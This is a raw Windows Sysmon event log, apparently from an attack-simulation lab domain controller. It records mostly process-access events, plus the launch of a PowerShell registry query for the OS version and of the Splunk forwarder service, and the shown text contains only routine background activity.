13:53:21.802{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.801{10ACEC4A-8551-5FCF-3000-000000009101}15483788C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.802{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.788{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.787{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.228{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.748{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.747{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.734{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.734{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.734{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.734{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.734{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.734{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.733{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.733{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.733{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C: